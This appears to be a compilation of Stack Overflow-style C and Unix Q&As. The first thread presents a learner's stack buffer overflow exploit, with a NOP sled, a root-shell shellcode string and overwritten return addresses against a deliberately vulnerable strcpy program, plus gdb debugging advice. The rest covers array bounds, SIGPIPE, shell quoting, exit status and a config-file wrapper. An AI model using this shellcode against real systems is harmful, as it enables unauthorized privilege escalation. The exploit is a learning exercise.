I am trying to perform a stack-based buffer overflow using Perl (the goal being to get root privileges from a normal user account via shellcode). I am learning hacking with Jon Erickson's book and I would be really glad if you would help me a bit.
I am typing this command:
./vuln `perl -e 'print "\x90"x202'``cat shellcode``perl -e 'print "\x70\xcc\x81\xbe"x70;'`
vuln:
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[500];
    strcpy(buffer, argv[1]);
    return 0;
}
shellcode:
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
and I get "Segmentation fault". I know that I need to fill every ret adress but no matter what I do, when I am trying to paste more than 67 ESP (stack pointers) I get this error.
Try running the program under gdb and see where it crashes. One thing in particular to be careful of when using cat file in your exploit is that it may append a newline (\n) byte and knock your shellcode out of alignment.
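For example, a hypothetical session might look like this (your addresses and register values will differ):

$ gdb ./vuln
(gdb) run `perl -e 'print "\x90"x202'``cat shellcode``perl -e 'print "\x70\xcc\x81\xbe"x70;'`
Program received signal SIGSEGV, Segmentation fault.
(gdb) info registers eip
(gdb) x/32xw $esp

If eip holds your repeated return-address value, the overwrite worked and the address itself is probably wrong; if not, recount your padding. You can also check the cat issue with xxd shellcode to see whether a trailing 0x0a byte crept in.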
I am new to C programming and I am really confused by the code below:
#include <stdio.h>
#include <string.h>

int main(void)
{
    char arrstr[6];
    int i;

    printf("Enter: ");
    scanf("%s", arrstr);
    printf("arrstr is %s\n", arrstr);
    printf("length of arrstr is %zu\n", strlen(arrstr));
    for (i = 0; i < 20; i++)
    {
        printf("arrstr[%d] is %c, dec value is %d\n", i, arrstr[i], arrstr[i]);
    }
    return 0;
}
From my understanding, after the declaration of arrstr[6], the compiler will allocate 6 bytes for this char array, and, accounting for the trailing '\0' char, 5 valid chars can be stored in it.
But after I run this short code, I get a result I don't understand: the printf shows all the chars I input, no matter how long the input is. Yet when I use an index to check the array, it seems I cannot find the extra chars in it.
Can anyone help explain what happened?
Thanks.
Try changing your code by adding this line right after the scanf statement:
arrstr[5] = '\0';
What has happened is that the null character was overwritten by the user entry. Putting the null character back in manually gives you proper behavior for the next two lines, the printf statements.
The for loop is another matter. C does not have any kind of bounds checking, so it's up to the programmer not to overrun the bounds of an array. The values you read past the end could be anything at all, since at that point you are just reading whatever bytes happen to sit in memory beyond the array. A standard way of avoiding this kind of mismatch is to declare the array size in one place:
const int SIZE = 6;
char arrstring[SIZE];
Then also use SIZE as the limit in the for loop. (In C90 you'd use a #define or an enum constant instead, since a const int is not a constant expression there; with a const int, the declaration above is a C99 variable-length array.)
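For instance, the loop from the question then becomes (a minimal sketch reusing the names above):

for (i = 0; i < SIZE; i++)
{
    printf("arrstring[%d] is %c, dec value is %d\n", i, arrstring[i], arrstring[i]);
}

That way the array size and the loop bound can never drift apart.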
P.S. There is still a problem here with the user entry as written, because a user could theoretically enter hundreds of characters, and all of them would be written out of bounds, possibly causing weird bugs. There are ways to limit the amount of user input, but it gets fairly involved; here are some Stack Overflow posts on the topic, with a small fgets sketch after the list. Keep them in mind for future reference:
Limiting user entry with fgets instead of scanf
Cleaning up the stdin stream after using fgets
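As a minimal sketch of the fgets approach (buffer size and names taken from the question; fgets never writes more than sizeof arrstr bytes, terminator included):

#include <stdio.h>
#include <string.h>

int main(void)
{
    char arrstr[6];

    printf("Enter: ");
    if (fgets(arrstr, sizeof arrstr, stdin) != NULL)
    {
        arrstr[strcspn(arrstr, "\n")] = '\0'; /* strip the newline, if it fit */
        printf("arrstr is %s\n", arrstr);
        printf("length of arrstr is %zu\n", strlen(arrstr));
    }
    return 0;
}

Anything beyond the first five characters stays in stdin, which is where the cleanup from the second link comes in.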
Why is no output shown for the code below? When I comment out the line close(pipefd1[0]);, the code works well; otherwise it does not even print "checking" on the terminal.
#include <bits/stdc++.h>
using namespace std;
#include <stdlib.h>
#include <unistd.h>

int main() {
    int pipefd1[2];
    char buff[100] = "hey there";
    char be[100];

    pipe(pipefd1);
    close(pipefd1[0]);
    cout << "checking";
    write(pipefd1[1], buff, 100);
    close(pipefd1[1]);
    read(pipefd1[0], be, 100);
    close(pipefd1[0]);
    cout << be;
}
The problem, though, is that you are writing to a pipe without a reader: you close the read end before calling write. Per the specification of POSIX write, writing to a pipe that is not open for reading raises an error:
[EPIPE]
An attempt is made to write to a pipe or FIFO that is not open for reading by any process, or that only has one end open. A SIGPIPE signal shall also be sent to the thread.
By default, the SIGPIPE signal terminates your program, which prevents the remaining code from executing.
Since writing to the standard output is usually buffered, the program does not get a chance to flush the output, which makes it look as if the line cout << "checking"; was never executed. If you had written std::cout.flush(); (or ended the line with std::endl) after writing "checking", you would have seen it on your terminal.
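As a minimal sketch of a working ordering in C (same POSIX calls as the question; within a single process, write while the read end is still open and close it only after reading):

#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    int pipefd1[2];
    char buff[100] = "hey there";
    char be[100];

    if (pipe(pipefd1) == -1)
        return 1;

    printf("checking\n");                       /* newline also flushes line-buffered stdout */
    write(pipefd1[1], buff, strlen(buff) + 1);  /* read end still open: no SIGPIPE */
    close(pipefd1[1]);

    read(pipefd1[0], be, sizeof be);
    close(pipefd1[0]);
    printf("%s\n", be);
    return 0;
}

Note this only works because the message is far smaller than the pipe's buffer; a single-threaded process writing more than the pipe capacity would block forever with nobody reading.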
I'm wondering if there is some pattern or trick for remembering when to use quotes (and when not to) in command-line arguments.
e.g. what is the difference between:
find -type f -name "*<extension-with-quotes>"
and
cp <extension-without-quotes> ../<new-folder>
One needs quotes and one does not, else it gives an error. Why?
You need quotes if you don't want the shell expanding the arguments, but instead want the argument passed through verbatim to whatever program you're trying to run. See, for example, the following program:
#include <stdio.h>

int main (int argc, char *argv[]) {
    printf ("Argument count = %d\n", argc);
    for (int i = 0; i < argc; i++)
        printf (" %2d: [%s]\n", i, argv[i]);
    return 0;
}
which outputs its argument count and arguments. The following transcript shows how it runs with and without quotes:
$ ./testprog "*.sh"
Argument count = 2
0: [./testprog]
1: [*.sh]
$ ./testprog *.sh
Argument count = 7
0: [./testprog]
1: [xmit.sh]
2: [gen.sh]
3: [morph.sh]
4: [prog.sh]
5: [mon.sh]
6: [test.sh]
So, for example, if you're in a directory with three log files, the shell will change your:
ls *.log
into:
ls a.log b.log c.log
before handing that list on to the ls program (the ls program will never see the *.log at all).
However, find expects a file pattern rather than a list of files, so it will want the *.log passed through as is, one single argument rather than three individual arguments expanded by the shell.
In fact, if you had only a.log in the current directory, an unquoted *.log would only find files called a.log regardless of how many other log files existed in the directories below. That's because find never saw the *.log, only the a.log that the shell expanded it to.
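For example, with a hypothetical layout where a.log sits in the current directory and more logs live below it (the file names here are made up):

$ ls
a.log  subdir
$ ls subdir
b.log  c.log
$ find . -name "*.log"
./a.log
./subdir/b.log
./subdir/c.log
$ find . -name *.log
./a.log

In the unquoted case the shell rewrote the command to find . -name a.log before find ever ran.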
A similar example is with expr. If you want to know what three times seven is, you don't want to be doing:
expr 3 * 7
since the shell will first expand * into all the files in the current directory:
3 dallas_buyers_club.avi nsa_agent_list.txt whitehouse_bomb.odt 7
and expr won't be able to make much sense of that¹. The correct way of doing it is along the lines of:
expr 3 '*' 7
in effect preserving the * so the program gets it unchanged.
¹ Special note to the NSA, CIA, MPAA and other dark shadowy organisations formed to strike fear into the hearts of mortal men: that file list is fictional humour. I really don't want any men in dark suits showing up at my front door :-)
I'm trying to run a program through gdb, using perl to print "A" 512 times. It returned with code 04. I started slowly going down to 511, then 510, and so on, but it still returned with code 04. Is this how it's supposed to be? If not, what am I doing wrong? Thanks for your answers.
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buf[256];

    if (argc == 1)
    {
        printf("Usage: %s input\n", argv[0]);
        exit(0);
    }
    strcpy(buf, argv[1]);
    printf("%s", buf);
}
And I'm running from gdb:
run perl -e 'print "A" x 512'
There's no reason to involve either perl or gdb for this.
As of the 1989/1990 C standard, reaching the } at the end of main returns an undefined status to the environment. (The actual status of 4 in your case is probably the value returned by printf, which is the number of characters it printed. The way you invoked the program, argv[1] points to the string "perl", which is 4 characters long. But you absolutely should not count on that behavior.)
The 1999 standard introduced a new rule (inspired by C++): reaching the end of main does the equivalent of return 0;. But gcc by default uses the C90 standard plus GNU extensions (equivalent to -std=gnu90).
Add a return 0; to the end of your main function and/or compile your C program with an option that specifies a later standard, such as -std=c99 (or -std=gnu99 if you want to use GNU-specific extensions).
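A hypothetical session illustrating the difference (assuming the program was built as foo, as in the invocation below; the 4 under -std=gnu90 is just the leftover printf return value described above and is not guaranteed):

$ gcc -std=gnu90 -o foo foo.c
$ ./foo perl; echo $?
perl4
$ gcc -std=c99 -o foo foo.c
$ ./foo perl; echo $?
perl0

Note how the missing trailing newline glues the program's output to the status; that's the other problem mentioned below.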
Finally, it looks like you were trying to print 512 'A' characters, but you were invoking your program with the arguments:
perl -e 'print "A" x 512'
That's three arguments, and your program ignores all but the first, the 4-character string "perl". The remaining arguments were meant to be passed to the Perl interpreter, but you didn't invoke the Perl interpreter.
One correct way to do this would be:
./foo $(perl -e 'print "A" x 512')
where foo is the name of your program. But that would cause undefined behavior (possibly a program crash, or it might appear to "work" if you're unlucky), because you copy the string pointed to by argv[1] into an array of only 256 characters. For this simple program, that's easily avoided by not copying the string.
And your program's output doesn't end with a newline, which can cause problems. On a UNIX-like system, the program's output will likely be printed on the same line as your next shell prompt -- or the output might not be visible at all.
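A minimal sketch with those issues addressed (no copy, so no 256-byte buffer to overflow, plus a trailing newline and a well-defined status):

#include <stdio.h>

int main(int argc, char *argv[])
{
    if (argc == 1)
    {
        printf("Usage: %s input\n", argv[0]);
        return 0;
    }
    printf("%s\n", argv[1]); /* print the argument directly */
    return 0;
}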
To see the program's exit status, type:
echo $?
(This assumes you're using bash or a similar shell.)
I have a command-line executable program that accepts a configuration file as its one launch argument. The configuration file contains only two lines:
#ConfigFile.cfg
name=geoffrey
city=montreal
Currently, the wrapper program that I'm building for this command-line executable writes the configuration file to disk and then passes that written file as the argument when launching the program:
> myProgram.exe configFile.cfg
Is it possible to pass these configuration entries directly on the command line, as if they were the configuration file, allowing me to bypass writing the file to disk while the program still runs as if it were reading from a configuration file?
Perhaps something like the following:
> myProgram.exe configFile.cfg(name=geoffrey) configFile.cfg(city=montreal)
If you don't control the source for the program you're wrapping, and it doesn't already provide a facility to receive input in another way, you're going to find it difficult at best.
One possibility would be to intercept the file open and access calls used by the program though this is a horrible way to do it.
It would probably involve injecting your own runtime libraries containing (for C) fopen, fclose, fread and so on, between the program and the real libraries (such as with LD_PRELOAD or something similar), and that's assuming it's not statically linked. Not something for the faint of heart.
If you're worried about people being able to see your file, there's plenty of ways to avoid that, such as by creating it with rwx------ permissions in a similarly protected directory (assuming UNIX-like OS). That's probably safer than using command line arguments which any joker logged in could find out with a ps command.
If you just don't want the hassle of creating a file, I think you'll find the hassle of avoiding it is going to be so much more.
Depending on what you're really after, it wouldn't take much to put together a program that accepted arguments, wrote them to a temporary file, called the real program with that temporary file name, then deleted the file.
It would still be being written to disk, but that would no longer be the responsibility of your wrapper program. Something along the lines of (a bit rough, but you should get the idea):
#include <stdio.h>
#include <stdlib.h>     // malloc, free, system
#include <string.h>     // strlen

#define PROG "myProgram"

char *getTempFSpec (void);  // need to provide this.

int main (int argCount, char *argVal[]) {
    char *tmpFSpec;
    FILE *fHndl;
    int i;
    char *cmdBuff;

    tmpFSpec = getTempFSpec ();
    if (tmpFSpec == NULL) {
        // handle error.
        return 1;
    }

    cmdBuff = malloc (sizeof (PROG) + 1 + strlen (tmpFSpec) + 1);
    if (cmdBuff == NULL) {
        // handle error.
        return 1;
    }

    fHndl = fopen (tmpFSpec, "w");
    if (fHndl == NULL) {
        // handle error.
        free (cmdBuff);
        return 1;
    }

    // One argument per line, mimicking the name=value config format.
    for (i = 1; i < argCount; i++)
        fprintf (fHndl, "%s\n", argVal[i]);
    fclose (fHndl);  // flush before the real program opens the file.

    sprintf (cmdBuff, "%s %s", PROG, tmpFSpec);
    system (cmdBuff);

    remove (tmpFSpec);  // delete the temporary file afterwards.
    free (cmdBuff);
    return 0;
}
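One possible getTempFSpec, as a sketch only (assumes a POSIX system; mkstemp creates the file with owner-only permissions, which also covers the visibility concern above):

#include <stdlib.h>     // mkstemp
#include <string.h>     // strdup
#include <unistd.h>     // close

char *getTempFSpec (void) {
    char templ[] = "/tmp/wrapcfgXXXXXX";
    int fd = mkstemp (templ);   // creates the file mode 0600 and fills in the Xs
    if (fd == -1)
        return NULL;
    close (fd);                 // main() reopens it with fopen
    return strdup (templ);      // caller frees (or lets exit clean up)
}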